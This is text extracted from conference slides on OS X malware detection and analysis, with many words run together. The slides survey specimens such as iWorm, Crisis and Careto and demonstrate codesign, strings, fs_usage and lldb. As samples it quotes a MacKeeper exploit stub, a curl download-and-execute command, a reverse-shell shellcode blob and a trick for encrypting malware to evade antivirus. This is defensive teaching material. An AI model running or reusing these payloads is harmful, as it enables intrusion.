LET’S PLAY DOCTOR practical os x malware detection & analysis

@patrickwardle

WHOIS

“leverages the best combina1on of humans and technology to discoversecurity vulnerabili1es in our customers’ web apps, mobile apps, IoTdevicesandinfrastructureendpoints”

@patrickwardle

security for the 21st century

careerhobby

OUTLINESTEPSTOAHAPPIER,HEALTHIER2016

outbreaks

diagnos7cs analysis

health&happiness

virology

PART0X1:OUTBREAKSOVERVIEWOFRECENTOSXMALWARESPECIMENS

MALWAREONOSXYES;ITEXISTSANDISGETTINGMOREPREVALENT

“Itdoesn’tgetPCviruses.AMacisn’tsuscep1bletothethousandsofvirusesplaguingWindows-basedcomputers.”-apple.com(2012)

2014:"nearly1000uniqueaMacksonMacs;25majorfamilies"-kasperksy

2015:"ThemostprolificyearinhistoryforOSXmalware...5xmoreOSXmalwareappearedin2015thanduringthepreviousfiveyearscombined"-bit9

2015:OSXmostvulnerableso@warebyCVEcount-cvedetails

OSX/IWORM‘STANDARD’BACKDOOR,PROVIDINGSURVEY,DOWNLOAD/EXECUTE,ETC.

#fs_usage-w-ffilesys20:28:28.727871open /Library/LaunchDaemons/com.JavaW.plist20:28:28.727890writeB=0x16b

launchdaemon survey download execute

persis7ng

infectedtorrents launchdaemonplist

OSX/CRISIS(RCSMAC)HACKINGTEAM'SIMPLANT;COLLECTALLTHINGS!

launchagent rootkitcomponent

persistence(leakedsourcecode)

intelligencecollec7on

“HackingTeam Reborn; Analysis of an RCS Implant Installer"

OSX/XCODEGHOSTAPPLICATIONINFECTOR

$lessXcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec ...

Name=ALL_OTHER_LDFLAGS;

DefaultValue="$(LD_FLAGS)$(SECTORDER_FLAGS)$(OTHER_LDFLAGS)$(OTHER_LDFLAGS_$(variant))$(OTHER_LDFLAGS_$(arch))$(OTHER_LDFLAGS_$(variant)_$(arch))$(PRODUCT_SPECIFIC_LDFLAGS) -force_load$(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices";

modifiedLD.xcspec file

source

compileappstore

infected :(

infectedapp appinstalled

found by: ClaudXiao

}OSX/GENIEO(INKEEPR)MOSTPROLIFICOSXADWARE

browserextension(s)fakeinstallers

bundledwithapps

ADs

OSX/BACKDOOR(?)BOT/BACKDOORTHATEXPLOITSMACKEEPER

<script>window.location.href='com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/<BASE_64_ENCODED_STUB>';...

"[a]flawinMacKeeper'sURLhandler implementa1onallowsarbitraryremotecodeexecu1onwhenauservisitsaspeciallycra]edwebpage"-baesystems

exploit & payload

launchagent

curl-A'Safari'-o/Users/Shared/dufhhttp://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr;chmod755/Users/Shared/dufh;cd/Users/Shared;./dufh

shell download executesurvey

OSX/KERANGERFIRST(IN-THE-WILD,FUNCTIONAL)OSXRANSOMWARE

official app website; distributing!

'validly'signed

/Users/*

/Volumes: *.doc, *.jpg, etc

transmissionbt.com

OSX/CARETO('MASK')'CYBERESPIONAGEBACKDOOR'

launch agent

[~/Library/LaunchAgents/com.apple.launchport.plist]

lea rdi, encodedServer ; "\x16d\n~\x1AcM!"... mov rsi, decodedServer call __Dcd

...

mov rdi, decodedServer mov esi, cs:_port call _sbd_connect

$lldbOSX_Careto(lldb)targetcreate"OSX_Careto"Currentexecutablesetto'OSX_Careto'(x86_64).''(lldb)b_DcdBreakpoint1:where=OSX_Careto`_Dcd,

...

$(lldb)x/sdecodedServer0x100102b40:"itunes212.appleupdt.com"

disassembly

debugging (decoding C&C)

encoded strings

phishing/exploits

PART0X2:VIROLOGYSTUDYOFOSXMALWARECHARACTERISTICS&COMMONALITIES

INFECTIONVECTORSMETHOD0X1:VIAUSER-INTERACTION

fakecodecs

fakeinstallers/updates

infectedtorrents

rogue"AV"products???

poor naive users!

INFECTIONVECTORSMETHOD0X2:EXPLOITS

"interested in buying zero-day vulnerabili1es with RCE exploits for the latestversions of ...Safari? ...exploits allow to embed and remote execute custompayloadsanddemonstratemodern[exploita1on]techniquesonOSX" -V.Toropov(emailtohackingteam)

howtherealhackersdoit

} ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" + ;"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" + ;"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" + ;"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" + ;"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" + ;"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" + ;"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" + ;"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" + ;"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05"

PERSISTENCEMANYOPTIONS,FEWUSED

launchdaemons&agentsuserloginitems

browserextensions&plugins

[RSA2015]"Malware Persistence on OS X"

~20 techniques

FEATURESDEPENDENTONTHEGOALSOFTHEMALWARE

[criminal] [espionage]

shell

video

audio

ads

clicks

money

keylogs

surveys downloads

exec's

SUMMARYTHECURRENTSTATEOFOSXMALWARE

persistence

pspbypassself-defense

features

‣wellknownmethods‣majority:launchitems

‣minimalobfusca7on‣trivialtodetect/remove

‣poorlyimplemented‣sufficeforthejob

‣occasionalan7-AV‣nopspdetec7on

stealth

‣'hide'inplainsite‣rootkits?notcommon

infec7on

‣trojans/phishing‣someexploits

PART0X3:DIAGNOSTICSAREYOUINFECTED?

VISUALLYOBSERVABLEINDICATORSMOREOFTENTHANNOT,YOU'RENOTINFECTED...

unlikelymalware possiblymalware

"mycomputerissoslow"

"itkeepscrashing"

ADs

"somanyprocesses"

"therearetonsofpopups"

"mycomputersaysitsinfected

"myhomepageandsearchengineareweird"

most not trivially observable!

VISUALLYOBSERVABLEINDICATORSGENERICALERTSMAYINDICATETHEPRESENCEOFMALWARE

persistence(BlockBlock)networkaccess(LittleSnitch)

suchtoolsdonotattempttodirectlydetectmalwareper-se…

STEP0X1:KNOWNMALWAREANYKNOWNMALWARERUNNINGONYOURSYSTEM?

TaskExplorer(+VirusTotalIntegration)

VT ratios

STEP0X2:SUSPICIOUSPROCESSESANYUNRECOGNIZEDBINARIESRUNNINGONYOURSYSTEM?

unsignedtasks

“globalsearch”for:

3rd-partytasks

unsigned

"apple"

unrecognized(byVT)

suspicious!

+

+

STEP0X3:SUSPICIOUSPERSISTENCEANYUNRECOGNIZEDBINARIESPERSISTINGONYOURSYSTEM?

KnockKnock;enum.persistence

unsigned

"apple"

suspicious!

asuspiciouslaunchitem

unrecognized(byVT)+

+

STEP0X4:NETWORKI/OODDPORTSORUNRECOGNIZEDCONNECTIONS?

#sudolsof-i|grepESTABLISHED

apsd75rootTCP172.16.44.128:49508->17.143.164.32:5223(ESTABLISHED)apsd75rootTCP172.16.44.128:49508->17.143.164.32:5223(ESTABLISHED)com.apple1168userTCP172.16.44.128:49511->bd044252.virtua.com.br:https(ESTABLISHED)JavaW1184rootTCP172.16.44.128:49532->188.167.254.92:51667(ESTABLISHED)

iWorm('JavaW')listeningforattackerconnection

or 'established' for connected sessions

iWormconnectedtoC&Cserver

STEP0X5:SUSPICIOUSKEXTS,HIJACKEDDYLIBS,ETC.COUNTLESSOTHERTHINGSTOLOOKFOR....

uncheck ‘'Show OS Kexts'

anysuspiciouskernelextensions?

hijackeddylibs?

[DefCon2015]"DLL Hijacking on OS X? #@%& Yeah!"

PART0X4:ANALYSISDETERMINEIFSOMETHINGISMALICIOUS....ORNOT!?

CODE-SIGNINGEXAMINETHEBINARY’SCODESIGNATURE

$codesign-dvv/usr/lib/libtidy.A.dylibFormat=Mach-Ouniversal(i386x86_64)

Authority=SoftwareSigningAuthority=AppleCodeSigningCertificationAuthorityAuthority=AppleRootCA

libtidy issignedbyappleproper

codesign-dvvOSX_CaretoOSX_Careto:codeobjectisnotsignedatall

mostmalware;unsigned

signed by apple: not malware!

libtidy dylibflaggedbyVT

usecodesigntodisplayabinary’ssigninginfo

ex:$ codesign -dvv <file>

GOOGLETHEHASHMAY(QUICKLY)TELLYOU;KNOWNGOOD||KNOWNBAD

$md5appleUpdaterMD5(appleUpdater)=2b30e1f13a648cc40c1abb1148cf5088

unknownhash….mightbeodd

‣ 3rd-partybinaries,mayproducezerohitsongoogle

‣ 0%detectiononvirustotaldoesn’tmean100%notmalware

knownhash(OSX/Careto)

STRINGSQUICKLYTRIAGEABINARY’SFUNCTIONALITY

$strings-aOSX_Careto

reverselookupof%sfailed:%sbind():%sconnectingto%s(%s)[%s]onport%uexecuting:%s

cM!M>`W9_c[0;32m

strings;OSX/Careto

networking&execlogic

encodedstrings

$strings-aJavaW$Info:ThisfileispackedwiththeUPXexecutablepacker$Id:UPX3.91Copyright(C)1996-2013theUPXTeam.

strings;iWorm

usewiththe-aflag

packed(UPX)

googleinterestingstrings

FILEATTRIBUTESOSXNATIVELYSUPPORTENCRYPTEDBINARIES

ourhardworkbythesewordsguardedpleasedontsteal(c)AppleC

encryptedwithBlowfish

disassemblingFinder.app

encryp7ngthemalware

$strings-amyMalwareinfectUser:ALOHARSA!

$./protectmyMalwareencrypted'myMalware'

$strings-amyMalwaren^jd[P5{Qr_`EYFaJq07

known malware: ~50% drop VT detection

FILEATTRIBUTESDETECTINGENCRYPTEDBINARIES

//check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i]; //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected

if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED

detec7ngencryp7onTaskExplorer

}unsigned

encrypted+

FILEATTRIBUTESMALWAREISOFTENPACKEDTO'HINDER'DETECTION/ANALYSIS

$strings-aJavaWInfo:ThisfileispackedwiththeUPXexecutablepackerhttp://upx.sf.netId:UPX3.09Copyright(C)1996-2013theUPXTeam.AllRightsReserved.

iWorm(JavaW);packed

//count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); }

TaskExplorer

genericpackerdetectionalgorithm

viewallpackedtasks/dylibs

CLASSDUMPEXTRACTCLASSNAMES,METHODS,&MORE...

$class-dumpRCSMac.app@interface__m_MCore:NSObject{NSString*mBinaryName;NSString*mSpoofedName;}

-(BOOL)getRootThroughSLI;-(BOOL)isCrisisHookApp:(id)arg1;-(BOOL)makeBackdoorResident;- (void)renameBackdoorAndRelaunch;

@end

RCSMac(OSX/Crisis)

$class-dumpInstaller.app@interfaceICDownloader:NSObject<NSURLConnectionDelegate>{NSURL*_URL;NSString*_destPath;longlong_httpStatusCode;NSString*_suggestedName;}

-(void)startDownloading;

@interfaceNSURL(ICEncryptedFileURLProtocol)+(id)fileURLWithURL:(id)arg1;+(id)encryptedFileURLWithURL:(id)arg1;

@end

Adware'Installer'(InstallCore)http://stevenygard.com/projects/class-dump/

DYNAMICFILEI/OQUICKLYDETERMINEBINARIESFILE-RELATEDACTIONS

#fs_usage-w-ffilesystem

open/Users/user/Library/LaunchAgents/com.apple.updater.plistwriteF=2B=0x4a openF=5/Users/Shared/dufh…chmod<rwxr-xr-x>/Users/Shared/dufh

unlink./mackeeperExploiter

filei/o(mackeeperexploiter)

$manfs_usageFS_USAGE(1)BSDGeneralCommandsManual

fs_usage--reportsystemcallsandpagefaultsrelatedtofilesystemactivityinreal-time

fs_usagemanpage

persistenceaslaunchagent(com.apple.updater.plist)

installation(/Users/Shared/dufh)selfdeletion,cleanup

NETWORKI/OGAININSIGHTINTOTHEBINARY'SNETWORKCOMMUNICATIONS

OSX/CaretoinWireshark

note: C&C is (now) offline

oddDNSqueries periodicbeacons (custom)encryptedtraffic

"itunes212.appleupdt.com"

VIRUSTOTALSANDBOXFILEI/O+NETWORKI/O,ANDMORE!

virustotalportal

filei/o(iWorm)

networki/o(iWorm)

"VirusTotal+=MacOSXexecution"blog.virustotal.com/2015/11/virustotal-mac-os-x-execution.html

REVERSINGOBJECTIVE-CUNDERSTANDINGSOMEBASICS...

connectedToInternet(void) proc near

mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ...

internetcheck(mackeeperexploiter)

arg name (for) objc_msgSend 0 RDI class 1 RSI method name2 RDX 1st argument3 RCX 2nd argument4 R8 3rd argument5 R9 4th argument

objc_msgSendfunction

callingconvention(system v amd64abi)

DECOMPILATIONTHERE’SANAPPFORTHAT!

int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax;

var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; }

decompilation;internetcheck(mackeeperexploiter)

connectedToInternet(void) proc near

mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ...

hopper.apphttp://www.hopperapp.com

DEBUGGINGUSINGLLDB;OSX’SDEBUGGER

command description example

r launch (run) the process

b breakpoint on function b system

br s -a <addr> breakpoint on a memory add br s -a 0x10001337

si/ni step into/step over

po print objective-C object po $rax

reg read print all registers

$lldbnewMalware(lldb)targetcreate"/Users/patrick/malware/newMalware"Currentexecutablesetto'/Users/patrick/malware/newMalware'(x86_64).

beginningadebuggingsessionsee: "Gdb to LLDB Command Map"

commonlldbcommands

PART0X5:HEALTH&HAPPINESSHOWDOIPROTECTMYPERSONALMACS?

APPLE'SOSXSECURITYMITIGATIONS?GATEKEEPER,XPROTECT,SIP,CODE-SIGNING,ETAL...

"Security & privacy are fundamental to the design of all ourhardware,so]ware,andservices"-7mcook

‣ "Gatekeeper Exposed"(Shmoocon)

‣ "OS X El Capitan-Sinking the S/h\IP" ‣ "Memory Corruption is for Wussies!" (SysScan)

‣ "Writing Bad@ss OS X Malware" (Blackhat)

‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)

only 4 launch items

no 'java' processes

fully patched OS X

gatekeeper enabled

DEMO(GATEKEEPER BYPASS)

OSXLOCKDOWNHARDENSOSX&REDUCESITSATTACKSURFACE

#./osxlockdown[PASSED]EnableAutoUpdate[PASSED]DisableBluetooth[PASSED]Disableinfraredreceiver[PASSED]DisableAirDrop...osxlockdown0.9FinalScore86%;Passrate:26/30

osxlockdownS.Piper(@0xdabbad00)

github.com/SummitRoute/osxlockdown

“builttoaudit&remediate,securityconfigurationsettingsonOSX10.11"-S.Piper

OSXSECURITYTOOLLITTLESNITCHFIREWALL

“if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskipinstallationandproceedtoexecutethecleansoftware”-fSecure.com

trivialtobypass

securityvulnerabilities?yes, stay tuned!

'snitching

MYPERSONALSECURITYTOOLSOBJECTIVE-SEE,BECAUSE"SHARINGISCARING":)

"Nooneisgoingtoprovideyouaqualityservicefornothing.Ifyou’renotpaying,you’retheproduct."-fSecure

...as they try to sell things!

+ I should write some OS X security tools to protect my Mac ....and share 'em freely :)

SECURITYTOOLSOBJECTIVE-SEE(.COM)

KnockKnock BlockBlock

TaskExplorer

Ostiarius

Hijack Scanner

KextViewr RansomWhere?

CONCLUSIONSWRAPPINGTHISALLUP…

CONCLUSIONS&APPLICATIONMAHALOFORYOURATTENTION...Q&A?

osxmalware(iWorm,Crisis,Genieo,etc.)

learned about: scan & protect!

littlesnitch/firewall

patrick@synack.com @patrickwardle

genericdetection&analysis

credits

- iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/

- thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware-

and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

images

resources